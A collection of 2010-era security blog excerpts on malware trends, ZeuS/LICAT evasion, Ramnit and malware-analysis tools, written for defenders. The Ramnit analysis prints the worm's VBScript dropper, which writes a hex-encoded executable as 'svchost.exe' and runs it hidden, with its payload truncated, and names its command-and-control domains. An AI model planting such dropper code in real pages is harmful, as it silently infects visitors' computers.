Computer Security Articles

By far the biggest threat to users this month was drive-by downloads. This type of attack can result in users’ computers being infected even when visiting legitimate sites. – on Securelist / All Updates

Internet fraud has been around for just about as long as the Internet itself. Each year, cybercriminals come up with new techniques and tactics designed to fool their potential victims. – on Securelist / All Updates

As we wrote in last month’s report , at the end of September law enforcement agencies arrested a number of members from the criminal group behind ZeuS. – on Securelist / All Updates

The third quarter of 2010 started off with several favorable events for the anti-spam industry. In August, the security intelligence firm, LastLine, worked with a task force to shut down over 20 control centers used by the Pushdo / Cutwail botnet…

View full post on Securelist / All Updates

Overall, October was relatively quiet, although there were a few incidents worthy of note. Virus.Win32.Murofet, which infected a large number of PE files, was detected at the beginning of the month.

View full post on Securelist / All Updates

Our interim analysis of a version of the malware we detect as Java/Boonana.A or Win32/Boonana.A (depending on the particular component of this multi-binary attack) differs in some characteristics from other reports we've seen.
The most dramatic difference is in the social engineering hook used in messages sent to an infected user's friends list. Other reports (including … Read More.

View full post on ESET ThreatBlog

The most significant event of the month was the announcement in mid-September that the Spamlt partner program would be closed down on 1 October.

View full post on Securelist / All Updates

Following last September’s turn of events, where several individuals were arrested for using information stealing Trojans known as the ZeuS toolkit, a much anticipated “upgrade” was inevitable so that it could continue its money-making ploy. Soon enough, we received cases about a ZeuS Trojan (TSPY_ZBOT.BYZ) with the following new features:

1. Trojanizing executable files to keep the malware updated (turning them into PE_LICAT.A) and more difficult to remove.
2. Contacting pseudorandomly generated domains ala DOWNAD/Conficker to avoid easy takedowns.

Over the past few weeks we have been working on completing a comprehensive report on this new ZeuS upgrade. This includes analysis of its runtime decompression/de-obfuscation stub, configuration file decryption used in its information-stealing payload, the command and control servers used, and the above-mentioned file infection and domain generation algorithm.

Earlier this week, reports about the supposed SpyEye and ZeuS toolkit merger came out. The result of this merger may be a hybrid toolkit that uses the best features of both SpyEye and ZeuS.

The full analysis in the report, File-Patching ZBOT Variants: ZeuS 2.0 Levels Up, is the result of the collaborative effort of TrendLabs engineers/researchers Alvin Bacani, Mark Anthony Balanza, Feike Hacquebord, Marco Dela Vega, Julius Dizon, Patrick Estavillo, Jasper Manuel, Loucif Kharouni, David Sancho, Ben April and Robert McArdle.

We have been chronicling our findings about TSPY_ZBOT.BYZ, the ZeuS Trojan with LICAT features, in the following entries:

• File Infector Uses Domain Generation Technique Like DOWNAD/Conficker
• ZeuS Ups the Ante with LICAT
• ZeuS’ Response to Automated Analysis
• The Plot Thickens for ZeuS-LICAT
• ZeuS, Still a Threat; Now Also Spreading Through LICAT

View full post on TrendLabs | Malware Blog – by Trend Micro

Is it possible to define human intelligence so precisely as to be able to then simulate it with the aid of machines? That is still very much a bone of contention among the scientific community.

View full post on Securelist / All Updates

Risk management is, in a word, complicated. Hmmm… not strong enough – make that two words, it’s extremely complicated.

View full post on Network World on Security

Analyzing malware helps you understand the overall threat landscape. The next best thing to reverse-engineering malicious programs yourself is learning from other analysts’ reports.

Here are several excellent write-ups, authored by different researchers, which describe several types of malicious software:

• Murofet exhibits file infection and password stealing abilities. Marco Giuliani at Prevx provided insightful analysis of this specimen.
• Avzhan is a growing family of DDoS bots. Jeff Edwards at Arbor Networks offered a comprehensive overview of this family of malware.
• Visal is an email worm that spreads links to malicious Windows executable files. It was thoroughly examined by SecureWorks.
• “The Hottest girls on Facebook” worm uses clickjacking and social engineering to propagate. It was researched by Krzysztof Kotowicz. George Deglin examined another example of a Facebook worm.
• A malicious PDF file can split JavaScript across several objects. An example of this technique was documented by Tamas Rudnai at Websense.
• Attacks often combine a malicious PDF file with a Windows executable. One such incident was analyzed by CW.

I periodically post interesting malware analysis reports from across the web on the Reverse-Engineering Malware Course page on Facebook.

If you’d like to improve your own malware report-writing skills, take a look at my earlier note What to Include in a Malware Analysis Report, which includes a mind-map template.

— Lenny Zeltser

View full post on Lenny Zeltser on Information Security

The World Wide Web: educational or detrimental?

View full post on Securelist / All Updates

We’ve been spending some time looking into TSPY_ZBOT.BYZ—the ZeuS variant that was used in the recent LICAT file infector attack.

Aside from the behaviors noted in previous blog posts (File Infector Uses Domain Generation Technique Like DOWNAD/Conficker and ZeuS Ups the Ante with LICAT), TSPY_ZBOT.BYZ also uses techniques designed to avoid automatic heuristics-based detection. For example, common ZeuS 2.0 variants contain relatively few imported external APIs. (ZeuS 2.0 refers to variants of the ZeuS banking malware that have been spotted since the start of the year with improved information theft routines. They have been discussed in the previous blog posts At A Glance: New ZeuS Variants and A Look at ZBOT 2.0 Information Theft.)

By contrast, TSPY_ZBOT.BYZ imports many external APIs. To a heuristic scanner, this changes the appearance of the file and lowers the possibility of detection.

In addition, TSPY_ZBOT.BYZ is compressed somewhat differently from other ZeuS 2.0 variants. While to the human eye no differences can easily be seen, the calculable entropy of these samples is quite different. Encrypted and packed malware that are related will have similar entropy values, something that can be used in analysis and heuristic detections.

TSPY_ZBOT.BYZ is also designed to make analysis in sandboxed environments more difficult. Its dropped copy in the %Application Data% folder will have updated information about its “correct” location. If this particular copy is executed in a different folder, it will simply terminate.

Another routine especially worth noting is that TSPY_ZBOT.BYZ conducts an integrity check by searching for the string “DAVE” in its configuration file before performing its malicious routines. We are currently conducting further investigation on this routine and we will release an update as soon as information becomes available.

Update as of October 13, 2010, 6:00 PM (UTC – 7)

Clarification has been made with regard to the malware’s behavior in sandboxed systems.

Update as of October 14, 2010, 2:00 AM (UTC – 7)

Some of the domains used in these ZeuS attacks are now live and spreading new ZeuS variants. These variants show behavior similar to the original TSPY_ZBOT.BYZ sample, and are being proactively detected as TSPY_ZBOT.SMEQ. These active domains are also being actively blocked as well.

These new variants show the impact of TSPY_ZBOT.BYZ being able to avoid heuristic detection. Determining the relationship between TSPY_ZBOT.BYZ and the new variants would become harder; correspondingly the new variants would be more difficult to detect. However, our smart patterns are able to deal with this and detect these new variants accordingly.

To properly guard against this threat, conventional antivirus is not sufficient. Both improved detection techniques and proactive blocking of the websites, working together, can protect users.

View full post on TrendLabs | Malware Blog – by Trend Micro

The security was tight enough, but the raider knew exactly where the weak point in the system was. He had undergone special training to help him slip unnoticed through loopholes like these and infiltrate the network. The raider creates the loophole that lets others in — spies, thieves or…

View full post on Securelist / All Updates

While analyzing a malware sample today, I came across an interesting function. It uses red-herring local variables and red-herring global variables, and even once you get rid of that code, it’s still unclear as to what the function does.

 Since you don’t have access to the callers of this function, I’ll tell you this:

• The first argument is a null-terminated ASCII string.
  
• The second argument is a null-terminated ASCII string.
  
• The third argument is an integer.

Your challenge? Tell me what the function does. Your prize? You get to choose the name of the next malware family that I name. Stipulations:

• Cannot refer to the name of a person, place, or time.
  
• Cannot refer to anything obscene or offensive.
  
• Cannot be found in a dictionary or web-search.
  
• Cannot use camel-casing for compounding words — must begin with one uppercase letter and end with all lowercase letters.
  
• Must be a “generic” name (for example, shouldn’t contain the word “bot” or “worm”, since I have no idea what class of malware I’ll end up naming next).
  
• Must be humanly pronouncable.
  
• Must be between four and eight letters in length.
  
• I have final discretion over the name in case you think of something “bad” that isn’t covered by one of the rules above.

The winner is the first person to post a comment that correctly and fully describes in high-level English (not in code) what the function does.

And to in case you think I’m “hiring cheap labor” to analyze this for me, I’ll pull a Raymond Chen and say that the MD5 of my analysis is F2F3648B9BE371B4682B728A7A3D920F. Once the correct answer is posted, I’ll post my analysis which hashes to that MD5.

Here’s the function:

 sub_0           proc near



 var_10          = dword ptr -10h

 var_C           = dword ptr -0Ch

 var_8           = dword ptr -8

 var_4           = dword ptr -4

 arg_0           = dword ptr  8

 arg_4           = dword ptr  0Ch

 arg_8           = dword ptr  10h



                 push    ebp

                 mov     ebp, esp

                 sub     esp, 10h

                 push    ebx

                 push    esi

                 push    edi

                 mov     esi, [ebp+arg_4]

                 mov     [ebp+var_8], 697A259Dh

                 xor     [ebp+var_8], 182Ch

                 inc     dword ptr ds:42C094h

                 and     [ebp+var_C], 0

                 and     [ebp+var_4], 0

                 jmp     short loc_94

 ; —————————————————————————

 loc_2A:                                 ; CODE XREF: sub_0+A6j

                 xor     ebx, ebx

                 add     [ebp+var_8], 3AA5h

                 inc     dword ptr ds:42C094h

                 xor     edi, edi

                 jmp     short loc_81

 ; —————————————————————————

 loc_3D:                                 ; CODE XREF: sub_0+8Fj

                 mov     eax, [ebp+var_4]

                 add     eax, edi

                 mov     edx, [ebp+arg_0]

                 movsx   eax, byte ptr [edx+eax]

                 movsx   edx, byte ptr [esi+edi]

                 cmp     eax, edx

                 jnz     short loc_52

                 inc     ebx



 loc_52:                                 ; CODE XREF: sub_0+4Fj

                 mov     ecx, esi

                 or      eax, 0FFFFFFFFh



 loc_57:                                 ; CODE XREF: sub_0+5Cj

                 inc     eax

                 cmp     byte ptr [ecx+eax], 0

                 jnz     short loc_57

                 cmp     ebx, eax

                 jnz     short loc_72

                 inc     [ebp+var_C]

                 mov     eax, [ebp+arg_8]

                 cmp     [ebp+var_C], eax

                 jnz     short loc_72

                 mov     eax, [ebp+var_4]

                 jmp     short loc_C0

 ; —————————————————————————

 loc_72:                                 ; CODE XREF: sub_0+60j

                                         ; sub_0+6Bj

                 mov     eax, 43C9h

                 mul     [ebp+var_8]

                 mov     [ebp+var_10], eax

                 mov     [ebp+var_8], eax

                 inc     edi



 loc_81:                                 ; CODE XREF: sub_0+3Bj

                 mov     ecx, esi

                 or      eax, 0FFFFFFFFh



 loc_86:                                 ; CODE XREF: sub_0+8Bj

                 inc     eax

                 cmp     byte ptr [ecx+eax], 0

                 jnz     short loc_86

                 cmp     edi, eax

                 jb      short loc_3D

                 inc     [ebp+var_4]



 loc_94:                                 ; CODE XREF: sub_0+28j

                 mov     eax, [ebp+arg_0]

                 mov     ecx, eax

                 or      eax, 0FFFFFFFFh



 loc_9C:                                 ; CODE XREF: sub_0+A1j

                 inc     eax

                 cmp     byte ptr [ecx+eax], 0

                 jnz     short loc_9C

                 cmp     [ebp+var_4], eax

                 jb      short loc_2A

                 mov     eax, 0FFFFh

                 jmp     short loc_C0

 ; —————————————————————————

                 mov     eax, 514Ah

                 mul     dword ptr [ebp-8]

                 mov     [ebp-10h], eax

                 mov     eax, [ebp-10h]

                 mov     [ebp-8], eax



 loc_C0:                                 ; CODE XREF: sub_0+70j

                                         ; sub_0+ADj

                 pop     edi

                 pop     esi

                 pop     ebx

                 leave

                 retn

 sub_0           endp

And here’s the raw byte-code for the function above:

5589E583EC105356578B750CC745F89D257A698175F82C180000FF0594C04200
8365F4008365FC00EB6A31DB8145F8A53A0000FF0594C0420031FFEB448B45FC
01F88B55080FBE04020FBE143E39D075014389F183C8FF40803C010075F939C3
7510FF45F48B45103945F475058B45FCEB4EB8C9430000F765F88945F08945F8
4789F183C8FF40803C010075F939C772ACFF45FC8B450889C183C8FF40803C01
0075F93945FC7282B8FFFF0000EB11B84A510000F765F88945F08B45F08945F8
5F5E5BC9C3

View full post on REblog

Automating some aspects of malware analysis is critical for organizations that process large numbers of malicious programs. Such automation allows analysts to focus on the tasks that require human insights. There are several free toolkits you can use as the starting point for building your own automated malware analysis lab. The focus of this post is on the tools you can install locally; I wrote about free web-based behavioral analysis services earlier.

Two feature-rich and highly customizable options are outlined below:

• Jim Clausing documented his approach to building an automated behavioral malware analysis environment(PDF), building upon the Truman framework. Jim also provided several scripts to make it easier to make use of this methodology.
• Christian Wojner documented his approach to building a customized malware analysis system, describing the methodology employed at CERT.at. You can download the associated toolkit called Minibis.

There are several other toolkits you may find useful for automating aspects of behavioral malware analysis:

• Zero Wine by Joxean Koret is a full-featured tool for dynamically analyzing the behavior of Windows malware by running it within the WINE emulator on Linux.
• Buster Sandbox Analyzer by Buster is a wrapper around the Sandboxie tool for Windows, which helps you examine the key actions of applications executed by Sandboxie in your lab.
• Malheur by Konrad Rieck is a very promising tool for analyzing the volumes of data collected by behavioral sandboxes.
• REMnux by yours truly is a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software.

If you’re interested in building your own malware analysis toolkit manual behavioral review, take a look at the article I wrote earlier. You may also be interested in reading about the limitations of automated malware analysis.

— Lenny Zeltser

View full post on Lenny Zeltser on Information Security

There are relatively few new malicious programs in either ranking. It is, however, worth highlighting a new ‘bundle’: Trojan-Dropper.Win32.Sality.cx which installs Virus.Win32.Sality.bh to an infected computer.

View full post on Securelist / All Updates

My article on the SANS Forensics Blog describes 6 hex editors for analyzing malware and malicious documents. I outlined and compared key features for:

• FileInsight
• Hex Editor Neo
• FlexHex
• 010 Editor
• Hiew
• Radare

The tools differ in their ease-of-use and features. Of these, FileInsight and 010 Editor are my picks for Windows, and Radare is my favorite for Unix.

— Lenny Zeltser 

View full post on Lenny Zeltser on Information Security

Recently I came across a malware sample which have made some suspicious network activity to a domain called zahlung.name. The domain name looks very suspicious (German word for “payment”) so I decided to take a closer look at the sample.

The Malware which I will talking about in this post is a Worm called W32.Ramnit. The Worm was first discovered in 2010 (in January by Synamtec and in August by McAfee).

*** Worm W32.Ramnit ***
Let’s take a quick look at the behavior of Ramnit. The Worm always installs itself into the same directory using the same filename:

In this case the file has a very bad AV detection rate:

After the Worm infected the computer, it starts iexplore.exe in a invisible mode and injects itself into the process. In this way the Worm is able to bypass the local Firewall and communicate with it’s Command&Control Server (C&C).

As soon as the computer is infected, the Worm starts to spread itself by infecting all files on the victim’s computer which have the file extension EXE, DLL or HTML. For example, if Quick Time Player is installed on the victim’s computer the Worm will automatically search thru the directory and infecting the EXE, DLL and HTML files. Below is a screenshort of a clean systems (before the infection):

Followed by a screenshot of a infected system (same directory):

Note that the file size and date modified of the infected files has changed. The same goes for other directories with EXE, DLL or HTML files for example the Adobe Reader directory (before the infection):

And after infection:

Let’s compare the original (clean) files with the infected files which has been patched by Worm Ramnit:

As shown on Virustotal, the files which have been infected by the Worm are pretty good detected by most of the AV engines.

If we take a closer look into a infected HTML file we will see that the Worm has added a VB-Script at the end of the file:

<script type='text/javascript'>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003000000[...]"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

If a user runs the HTML file, the VB-Script will drop a file called “svchost.exe” and infect the computer.

*** C&C Communication ***
The Worm is using it’s own proprietary protocol to communicate with the C&C server on port 443 (which is normally HTTPs). Since August 2010 I’ve seen three different domain names which are being used by Worm Ramnit:

• zahlung.name (Firstseen on 2010-10-01)
• glavdmn.com (Firstseen on 2010-09-16)
• fget-career.com (Firstseen on 2010-09-03)

I’ve Google for all three domain names and I haven’t found any evidence which would show that these domain names are malicious. But of course they are. Unfortunately, if we lookup those domain names on URLVoid it won’t look better:

• www.urlvoid.com/scan/zahlung.name [Detection: 1/17 (6 %)]
• www.urlvoid.com/scan/glavdmn.com [Detection: 1/17 (6 %)]
• www.urlvoid.com/scan/fget-career.com [Detection: 1/17 (6 %)]

It’s a pretty good example that sometimes the AV industry fails.

*** How the Worm spread itself ***
Worm Ramnit uses several ways to spread itself and infect other computers:

• Drive-By exploits
• Infecting EXE, DLL and HTML files on the victims computer
• Infecting removable medium including USB Stick, USB Harddrives and CDs

*** Conclusion ***
Due to the fact, that the Worm installs itself always as “DesktopLayer.exe”, it shouldn’t be to hard to identify infected systems. If you Google for “DesktopLayer.exe” you will see over 30’000 hits including users who complaining about the file “DesktopLayer.exe” which they just found on their computer. So it looks like the Worm is already pretty wide spreaded.

As already mentioned before, the Worm has various methods how he can spread itself. Mainly worms are a big problem for large networks (like cooperate or governmental networks): If you have one infected computer the Worm will spread quickly within your network by infecting removable drivers or files one networks shares.

The mentioned C&C domain names which are associated with Worm Ramnit are already listed on AMaDa. Therefore you can use the AMaDa C&C Domain Blocklist to block C&C traffic or identify infected systems in your network.

Bookmark, tagg it or email it to a friend:

More »

View full post on abuse.ch

These days, when you scan Internet resources or take part in discussions, you inevitably come across materials and comments related to the use of cloud technology in antivirus protection.

View full post on Securelist / All Updates

With millions of Tweets and Facebook postings flying around daily from personal and business users, have you ever wondered where the links in these postings go?

In this Websense Insight we have analyzed hundreds of thousands of social networking links to determine the ecosphere of links and the potential threat vectors of the social Web.  Some of the findings may truly surprise you.

For example, did you know that 40 percent of Facebook status posts contain a URL, and that 10 percent of those are either spam or malicious?

We also provide some top tips for avoiding the potential dangers of user generated content within an organization and on your own Facebook wall.

To learn more about Websense Threat research in addition to this blog or view additional Websense Insights, please visit the Insights tab on http://community.websense.com/blogs/

To download the free Defensio application for free individual use, please visit defensio.com.

We'll have more analysis of these statistics and other Web Security findings in our upcoming "State of the Internet Report."

View full post on Security Labs

Whatever type of game you take as an example – a card game, a board game, or a game of cops and robbers – attempts to cheat will be as old as the game itself.

View full post on Securelist / All Updates

Didier Stevens (of pdf-parser.py fame) has published a 23-page paper on how to analyze nasty PDFs. While the content is a bit dated and the attackers have added more insidious exploit obfuscation to their arsenal since, the document explains all the concepts that are still valid and useful whenever you encounter a suspicious PDF today. If you’re into PDF analysis (and even if you aren’t , this is a must-read. http://blog.didierstevens.com/2010/09/26/free-malicious-pdf-analysis-e-book/

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

View full post on SANS Internet Storm Center, InfoCON: green

The title says it all…

This is a document I shared with my Brucon workshop attendees.

I know, this is a PDF document, you’ve to appreciate the irony

View full post on Didier Stevens